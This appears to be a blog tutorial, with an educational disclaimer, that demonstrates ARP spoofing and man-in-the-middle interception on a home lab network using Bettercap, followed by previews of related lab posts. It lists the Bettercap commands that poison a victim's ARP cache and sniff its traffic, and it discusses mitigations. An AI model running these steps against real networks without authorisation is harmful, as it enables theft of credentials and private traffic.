Step-by-Step Guide to Demonstrating Arp- Spoofing and Man-in-the-Middle Attacks in the Lab, by Aden Hawsh

 

Arp-spoofing and Man-in-the-Middle attack

  

An ARP spoofing cyberattack happens when an attacker uses the Address Resolution Protocol (ARP) to intercept communication between two parties, such as a user and a device, on a local area network (LAN). This attack is especially dangerous in the context of the Internet of Things (IoT), as it has the potential to undermine the entire network's security. Attackers can eavesdrop on the transmission or even manipulate the data being delivered by presenting themselves as a man-in-the-middle using ARP spoofing, putting both data integrity and confidentiality at risk.


ARP spoofing attacks on IoT devices entail multiple important components. Initially, the attacker discovers the target IoT devices and then manipulates the network's ARP signals to make their machine look like the legitimate gateway or device. This allows the attacker to intercept and perhaps change data sent between the IoT device and other networked devices, such as the home router. For example, an attacker may manipulate a smart thermostat's temperature data, resulting in erroneous activation or deactivation. Furthermore, the attacker may intercept sensitive data transmitted between the IoT device and other networked devices, such as login credentials or personal information.

 

A variety of measures can be used to reduce the danger of an ARP spoofing attack in IoT systems. Secure communication channels are essential and can be formed using encryption and authentication protocols such as SSL/TLS or SSH. Ensure that IoT devices receive timely security fixes and firmware updates to close potential vulnerabilities. Using strong, regularly updated passwords for IoT devices can help prevent unauthorised network access. Monitoring network traffic for signals of unusual activity, such as unexpected data flows to unfamiliar sites, is critical for early detection of ARP spoofing.

Implementing access control measures, like firewalls or virtual private networks (VPNs), can limit device access to authorized users only. Lastly, conducting regular security audits of the IoT network helps identify and rectify any security weaknesses, further fortifying the network against ARP spoofing attacks.

 


Figure 1. IoT man-in-the-middle (MITM)

Step 1. Setting up.


The diagram in Figure 1 displays some of the IoT devices in our home network, along with their corresponding IP and MAC addresses. 

To capture this information, we utilized Bettercap installed on the Parrot Security OS attacker machine. To scan all home IoT devices, we have configured the network card on our VirtualBox to use a bridge adapter, allowing us to utilize the network adapter of our Windows Dell Machine.

  

Figure 2 My home network IoT devices IP and Mac address

My Windows machine with the IP address 192.168.1.228 in my virtual box lab will use as the victim machine

           

Figure 3 Windows 19 victim machine IP Address.

 and My Parrot Security with IP address 192.168.1.193 will use as the attacker machine while the gateway router of my home network is 192.168.1.254 as shown in Figure 28

           


Figure 4.My home network router and gateway IP Address.

Now that we have configured the settings for the two machines, including their IP and MAC addresses, as well as the router or gateway IP address, the next step is to initiate the attack and provide a demonstration.

 

Step two.

I will restart my better cap tool from my parrot security attacking machine as a figure.

5 shows. On the terminal of Betterap


Figure 5. better cap starting command on Parrot Os command line

After starting Bettercap and running, we will utilize its various methods for conducting Man-in-the-Middle (MitM) attacks. In this example, we will employ ARP spoofing on the victim machine. Our Parrot attack machine will be positioned between the target victim machine and the home router, thereby acting as the router. As shown in Figure 29, all browsing and logging activities will be routed through our attack machine.

         

Figure 6.Showing how to use Arp spoof with the help of the help command.

Step 3:

In Figure 30 above, the 'Arp. Spoof' parameter offers several commands for ARP spoofing. To become the Man-in-the-Middle, we need to deceive both the victim and the router by informing the router that the victim's MAC address is our MAC address and telling the victim that the router's MAC address is our MAC address.


Figure 7 Setting up the interface we using

Step 4:

 To do this, we must set the 'arp. spoof. Full-duplex parameter to 'true' by typing 'set arp. spoof.full-duplex true'. Additionally, we must set the 'arp.spoof.targets' parameter by providing the IP address of our Windows victim machine. In our case, the command will be 'set arp. spoof.targets 192.168.1.228'.


Figure 8 Two main Arp spoofing commands

Step 5: Enable IP Forwarding

ARP deception will cause the targets to send their traffic to your computer, but your computer will be unable to process it. To direct traffic to the proper location, you must enable IP forwarding:


Figure 9 arp spoofing IP forwarding command.

Step 5: Start ARP Spoofing.

 We can now activate the ARP spoofing command and This will begin the ARP spoofing attack against the specified target.


Figure 10. initiating arp spoofing using the command (arp. spoof on)

 Step 6: Start Sniffing Traffic.

Finally, start sniffing the network traffic, this command will begin displaying the network traffic passing through your computer. (net. sniff.on)


Figure 11.  Starting the sniffing process from the attacking machine.

Next, we will use 'net. show' to check which settings are in place and confirm that the attack is running as intended.

Now let's check our Windows machine and see what has changed in the following Figure 12.


Figure 12 Windows victim machine whom he knows on Arp -a command.


We can see that we have successfully tricked the router Mac address on Windows Machine changing to the MAC address of our attacking machine, Parrot Security OS, which is the MAC address of the router. As a result, we have successfully deceived the victim's Windows machine into believing that we are the router. This means that all requests and browsing activity will be forwarded to our attacking machine, making it easy for us to harvest all credentials and view the browsing history of the victim machine.

 Conclusion

 In conclusion, through our step-by-step demonstration of ARP spoofing in a controlled lab environment using VirtualBox, we've observed first-hand the intricacies and potential vulnerabilities inherent in the Address Resolution Protocol (ARP). By simulating an ARP spoofing attack, it became clear how attackers can easily mislead network devices into sending data to the wrong destination, facilitating man-in-the-middle attacks and jeopardizing the confidentiality and integrity of the data being transmitted.

This lab exercise, intended for educational purposes, underscores the importance of understanding network vulnerabilities and the mechanisms behind common cyber-attacks. It serves as a vital learning tool for students and professionals alike, emphasizing the need for robust network security measures and developing skills to mitigate such attacks. Implementing security practices like static ARP entries, ARP spoofing detection tools, and the use of encrypted communication protocols can significantly reduce the risk posed by ARP spoofing.

Remember, the knowledge gained from this exercise should be used responsibly and ethically to enhance cybersecurity awareness and protection. Our exploration into ARP spoofing not only highlights the vulnerabilities present in everyday network communications but also promotes a deeper understanding of how to safeguard against such vulnerabilities.


Disclaimer: 

The information provided in this blog, especially regarding the Arp-spoofing attack lab, is intended for educational purposes only. It aims to increase cybersecurity awareness and demonstrate how individuals can safeguard their networks. Under no circumstances should the content be used to engage in or promote illegal activities. Network testing should only be conducted on networks you own or have explicit permission to analyze. The author assumes no responsibility for the misuse of the information or any damages resulting from applying the techniques outlined. Always practice ethical hacking and adhere to all applicable laws and regulations.


Aden Hawsh





Comments

Post a Comment

Popular posts from this blog

Setting Up a Lab: Step-by-Step Guide to Installing Suricata as an Intrusion Detection System on Raspberry Pi to Generate Logs, by Aden Hawsh

Image
   Introduction. This lab guide was methodically developed with the primary purpose of serving as an educational resource for those interested in learning about and setting up a Security Operations Centre (SOC) basic lab. It is aimed at students who want to properly monitor their small office or home networks(for project or practice) while maintaining security and integrity. The growing incidence of cybersecurity risks needs a solid understanding of how to safeguard network infrastructures against potential attacks and unauthorised access. This lab aims to provide readers with the information and skills necessary to install and deploy Suricata, an open-source Intrusion Detection System (IDS), on a Radxa Raspberry Pi. This guide serves as a comprehensive instructional, bringing readers through each crucial stage of the process, from the initial configuration to the final implementation and testing phases  IDS (Suricata) on Radxa Raspberry Pi Figure 1 demonstrates how...
Read more

Understanding the Threat of Evil Twin Attacks on Home Networks , Lab Step by Step . By Aden Hawsh

Image
Understanding the Threat of Evil Twin Attacks on Home Networks   An Evil Twin attack is a common cyberattack in which a hacker sets up a rogue Wi-Fi access point that looks and acts like a real network in order to trick gullible people into connecting to it rather than the real one under the false impression that it is secure. Once connected, the attacker can access the victim's data and obtain private information like credit card numbers, login passwords, and private messages.   This kind of attack is common in public places like cafes, airports, and hotels since it takes advantage of people's faith in well-known Wi-Fi networks and needs little equipment. It can, however, also target people at home, highlighting the significance of caution and network security procedures for all internet users. It is essential to comprehend how Evil Twin attacks work and how to reduce the dangers associated with them in order to safeguard oneself against potential cyber threats. The Evil Twin...
Read more